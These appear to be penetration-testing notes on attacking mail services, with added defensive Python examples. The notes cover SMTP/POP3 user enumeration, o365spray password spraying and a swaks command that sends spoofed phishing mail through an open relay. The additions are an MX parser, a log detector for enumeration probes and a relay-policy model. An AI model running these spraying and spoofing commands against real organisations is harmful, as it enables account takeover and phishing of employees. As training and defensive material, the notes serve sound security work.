When we press the Send button in our email application, the program establishes a connection to an SMTP server on the network or Internet.
When we download emails to our email application, it connects to a POP3 or IMAP4 server on the Internet; these protocols let the user keep messages in a server mailbox and download them periodically.
Enumeration
Email servers are complex and usually require us to enumerate multiple servers, ports, and services.
Most companies today use cloud email services such as Microsoft 365 or G Suite, so our approach to attacking the email service depends on the service in use.
We can use the Mail eXchanger (MX) DNS record to identify a mail server.
We can use tools such as host or dig, and online websites such as MXToolbox, to query information about the MX records.
Host - MX Records
host -t MX cia.gov
cia.gov mail is handled by 10 mail4.cia.gov.
cia.gov mail is handled by 10 mail3.cia.gov.
DIG - MX Records
dig mx fbi.gov | grep "MX" | grep -v ";"
fbi.gov. 120 IN MX 20 mx-west.fbi.gov.
fbi.gov. 120 IN MX 10 mx-east.fbi.gov.
Host - A Records
host -t A mx-west.fbi.gov.
mx-west.fbi.gov has address 153.31.192.142
| Port | Service |
|---|---|
| TCP/25 | SMTP Unencrypted |
| TCP/143 | IMAP4 Unencrypted |
| TCP/110 | POP3 Unencrypted |
| TCP/465 | SMTP Encrypted |
| TCP/587 | SMTP Encrypted/STARTTLS |
| TCP/993 | IMAP4 Encrypted |
| TCP/995 | POP3 Encrypted |
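The dig and host listings above print the same MX data in two different shapes. As an added example that is not part of the original notes, the parser below normalises either format into (preference, exchange) pairs; the sample strings are constructed from the output shown above, and the function names are my own.

```python
import re
from typing import List, Tuple

# Constructed samples modelled on the two output formats shown above
# (hostnames and preference values as printed by dig and host on this page).
DIG_MX_OUTPUT = """\
;; ANSWER SECTION:
fbi.gov.\t\t120\tIN\tMX\t20 mx-west.fbi.gov.
fbi.gov.\t\t120\tIN\tMX\t10 mx-east.fbi.gov.
"""

HOST_MX_OUTPUT = """\
cia.gov mail is handled by 10 mail4.cia.gov.
cia.gov mail is handled by 10 mail3.cia.gov.
"""

# dig answer line: <name> <ttl> IN MX <preference> <exchange>
DIG_LINE = re.compile(r"^\S+\s+\d+\s+IN\s+MX\s+(?P<pref>\d+)\s+(?P<host>\S+)$")
# host(1) line: <name> mail is handled by <preference> <exchange>
HOST_LINE = re.compile(r"^\S+ mail is handled by (?P<pref>\d+) (?P<host>\S+)$")


def parse_mx(output: str) -> List[Tuple[int, str]]:
    """Normalise dig or host MX output to sorted (preference, exchange) pairs.

    Sending MTAs try the lowest preference first, so the primary exchange
    comes first in the result. The trailing DNS root dot is stripped.
    """
    records = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):   # dig comment and blank lines
            continue
        match = DIG_LINE.match(line) or HOST_LINE.match(line)
        if match:
            records.append((int(match["pref"]), match["host"].rstrip(".").lower()))
    return sorted(records)


def primary_exchanges(records: List[Tuple[int, str]]) -> List[str]:
    """Every exchange sharing the lowest preference. Equal-preference hosts
    are used round-robin, so all of them are in scope, not just the first."""
    if not records:
        return []
    best = records[0][0]
    return [host for pref, host in records if pref == best]
```

Because comment lines are skipped by the parser, the `grep "MX" | grep -v ";"` filtering in the dig pipeline above is no longer needed; raw `dig mx <domain>` output can be fed in directly. The cia.gov sample shows why `primary_exchanges` returns a list: both hosts share preference 10 and either may receive mail.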
Misconfigurations
A misconfiguration can happen when the SMTP service allows anonymous authentication or supports protocols that can be used to enumerate valid usernames.
Authentication
The SMTP server has several commands that can be used to enumerate valid usernames: VRFY, EXPN, and RCPT TO. If we successfully enumerate valid usernames, we can attempt to password spray, brute-force, or guess a valid password. So let's explore how those commands work.
VRFY Command
The VRFY command instructs the receiving SMTP server to check the validity of a particular email username.
telnet <IP> 25
VRFY root
252 2.0.0 root
VRFY www-data
252 2.0.0 www-data
VRFY new-user
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table
EXPN Command
EXPN is similar to VRFY, except that when used with a distribution list, it will list all users on that list.
telnet <ip> 25
EXPN john
250 2.1.0 john@<domain>
EXPN support-team
250 2.0.0 carol@<domain>
250 2.1.5 elisa@<domain>
RCPT TO Command
RCPT TO identifies the recipient of the email message. This command can be repeated multiple times for a given message to deliver a single message to multiple recipients.
telnet <ip> 25
MAIL FROM:test@htb.com
250 2.1.0 test@htb.com... Sender ok
RCPT TO:julio
550 5.1.1 julio... User unknown
RCPT TO:kate
550 5.1.1 kate... User unknown
RCPT TO:john
250 2.1.5 john... Recipient ok
We can also use the POP3 protocol to enumerate users, depending on the service implementation.
USER Command
We can use the command USER followed by the username; if the server responds +OK, the user exists on the server.
telnet <IP> 110
USER julio
-ERR
USER john
+OK
To automate our enumeration process, we can use a tool named smtp-user-enum.
smtp-user-enum -M RCPT -U <userlist> -D <domain> -t <target>
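Seen from the mail server, the VRFY, EXPN and RCPT TO walk described above, whether typed by hand or driven by smtp-user-enum, leaves one `550 5.1.1 ... User unknown` reject per wrong guess in the MTA log, all from the same client address. The following added example (not from the original notes) runs that detection over constructed log lines written in Postfix's smtpd log format; the IP addresses, hostnames, usernames and the `enumeration_suspects` function name are all my own.

```python
import re
from collections import defaultdict
from typing import Dict

# Constructed sample in Postfix smtpd log format (not from a real server).
# 198.51.100.23 walks a wordlist with RCPT TO and tries one VRFY;
# 198.51.100.40 is a legitimate sender who mistyped a single address.
SAMPLE_LOG = """\
Mar  3 10:15:01 mail postfix/smtpd[2231]: connect from unknown[198.51.100.23]
Mar  3 10:15:02 mail postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[198.51.100.23]: 550 5.1.1 <julio@example.com>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<julio@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:02 mail postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[198.51.100.23]: 550 5.1.1 <kate@example.com>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<kate@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:03 mail postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[198.51.100.23]: 550 5.1.1 <sam@example.com>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<sam@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:03 mail postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[198.51.100.23]: 550 5.1.1 <maria@example.com>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<maria@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:04 mail postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[198.51.100.23]: 550 5.1.1 <admin2@example.com>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<admin2@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:04 mail postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[198.51.100.23]: 550 5.1.1 <test99@example.com>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<test99@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:05 mail postfix/smtpd[2231]: NOQUEUE: reject: VRFY from unknown[198.51.100.23]: 550 5.1.1 <bob@example.com>: Recipient address rejected: User unknown in local recipient table; to=<bob@example.com> proto=SMTP helo=<probe>
Mar  3 10:15:06 mail postfix/smtpd[2231]: disconnect from unknown[198.51.100.23] ehlo=1 mail=1 rcpt=0/6 vrfy=0/1 quit=1 commands=3/10
Mar  3 10:20:11 mail postfix/smtpd[2240]: connect from mail.partner.example[198.51.100.40]
Mar  3 10:20:12 mail postfix/smtpd[2240]: NOQUEUE: reject: RCPT from mail.partner.example[198.51.100.40]: 550 5.1.1 <jhon@example.com>: Recipient address rejected: User unknown in local recipient table; from=<alice@partner.example> to=<jhon@example.com> proto=ESMTP helo=<mail.partner.example>
Mar  3 10:20:13 mail postfix/smtpd[2240]: disconnect from mail.partner.example[198.51.100.40] ehlo=1 mail=1 rcpt=0/1 quit=1 commands=3/4
"""

# One match per "user unknown" reject, whether the probe came via RCPT TO or VRFY.
REJECT_RE = re.compile(
    r"reject: (?P<cmd>RCPT|VRFY) from \S+\[(?P<ip>[0-9A-Fa-f.:]+)\]: "
    r"550 5\.1\.1 <(?P<addr>[^>]*)>: Recipient address rejected: User unknown"
)


def enumeration_suspects(log_text: str, threshold: int = 5) -> Dict[str, dict]:
    """Return client IPs that probed >= threshold distinct unknown recipients,
    or used VRFY at all (a mail client has no reason to send VRFY)."""
    per_ip = defaultdict(lambda: {"unknown": set(), "cmds": set()})
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if m:
            per_ip[m["ip"]]["unknown"].add(m["addr"].lower())
            per_ip[m["ip"]]["cmds"].add(m["cmd"])
    findings = {}
    for ip, rec in per_ip.items():
        if len(rec["unknown"]) >= threshold or "VRFY" in rec["cmds"]:
            findings[ip] = {
                "distinct_unknown": len(rec["unknown"]),
                "commands": sorted(rec["cmds"]),
            }
    return findings
```

The threshold separates a scan from a typo: the partner host above rejects once and is not reported. Postfix lets an administrator refuse VRFY outright with `disable_vrfy_command = yes`, while RCPT TO cannot be switched off without breaking mail delivery, so for that path the controls are detection like the above plus Postfix's `smtpd_soft_error_limit` and `smtpd_hard_error_limit`, which delay and then drop clients that keep producing errors in one session.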
Cloud Enumeration
O365 Spray
O365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365).
Checking Username
python3 o365spray.py --validate --domain <domain>
python3 o365spray.py --enum -U <userlist> --domain <domain>
Password Spraying
python3 o365spray.py --spray -U <valid userlist> -p 'password123' --count 1 --lockout 1 --domain <domain>
Password Spraying Using Hydra
Protocol Specific Attacks
Open Relay
An open relay is an SMTP server that is improperly configured and allows unauthenticated email relay.
From an attacker's standpoint, we can abuse this for phishing by sending emails as non-existing users or spoofing someone else's email. With the nmap smtp-open-relay script, we can identify whether an SMTP port allows open relay.
nmap -p25 -Pn --script smtp-open-relay <ip>
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (14/16 tests)
Next, we can use any mail client to connect to the mail server and send our email.
swaks --from notifications@<domain> --to employees@<domain> --header 'Subject: Company Notification' --body 'Message' --server <ip>
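What the nmap script above is really probing is the server's answer to one question at RCPT TO time: is this recipient local, or is the client someone we relay for? The following added example (not Postfix code and not from the original notes) models that decision in a simplified form, puts the misconfigured policy beside the correct one, and checks each the way an open-relay test does. The domains, networks, addresses and the probe list are constructed; the probes cover the direct case and the source-routed address forms (`%`, `!`, quoted `@`) that a naive "is the domain ours?" test gets wrong.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Callable

# Constructed policy inputs: domains this MTA is the final destination for, and
# networks it relays for without authentication (Postfix would call these
# mydestination and mynetworks).
LOCAL_DOMAINS = {"example.com"}
TRUSTED_NETWORKS = [ip_network("10.0.0.0/8"), ip_network("127.0.0.0/8")]


@dataclass
class Envelope:
    client_ip: str
    authenticated: bool   # SASL AUTH succeeded earlier in this session
    mail_from: str
    rcpt_to: str


def _split(addr: str):
    """(local-part, lowercased domain) or ("", "") when there is no @."""
    local, sep, domain = addr.rpartition("@")
    return (local, domain.lower()) if sep else ("", "")


def relay_decision_hardened(env: Envelope) -> str:
    """Reply to RCPT TO under a correct policy: deliver to local domains for
    anyone, relay elsewhere only for authenticated or on-net clients."""
    local, domain = _split(env.rcpt_to)
    if not domain:
        return "501 5.1.3 Bad recipient address syntax"
    # user%other@local, other!user@local and "user@other"@local all look local
    # by domain but route onward after rewriting; refuse them before that test.
    if any(ch in local for ch in "%!@"):
        return "554 5.7.1 Relay access denied"
    if domain in LOCAL_DOMAINS:
        return "250 2.1.5 Ok"
    if env.authenticated or any(ip_address(env.client_ip) in net for net in TRUSTED_NETWORKS):
        return "250 2.1.5 Ok"
    return "554 5.7.1 Relay access denied"


def relay_decision_open(env: Envelope) -> str:
    """The misconfiguration: any recipient accepted regardless of who asks."""
    return "250 2.1.5 Ok"


# Constructed probes: an outside, unauthenticated client asks for an outside
# recipient, directly and through source-routing syntax aimed at the local domain.
RELAY_PROBES = [
    Envelope("203.0.113.9", False, "spoof@example.com", "victim@other.example"),
    Envelope("203.0.113.9", False, "", "victim%other.example@example.com"),
    Envelope("203.0.113.9", False, "spoof@example.com", "other.example!victim@example.com"),
    Envelope("203.0.113.9", False, "spoof@example.com", '"victim@other.example"@example.com'),
]


def is_open_relay(decide: Callable[[Envelope], str]) -> bool:
    """True if the policy would accept any probe for onward delivery."""
    return any(decide(p).startswith("250") for p in RELAY_PROBES)
```

Note that the hardened policy still accepts inbound mail for `example.com` from anyone and still accepts the spoofed `MAIL FROM` in the probes: relay control decides who may send through the server, not whether the claimed sender is genuine. The latter is the job of SPF, DKIM and DMARC on the receiving side, which is why the swaks command above can put `notifications@<domain>` in the sender field at all.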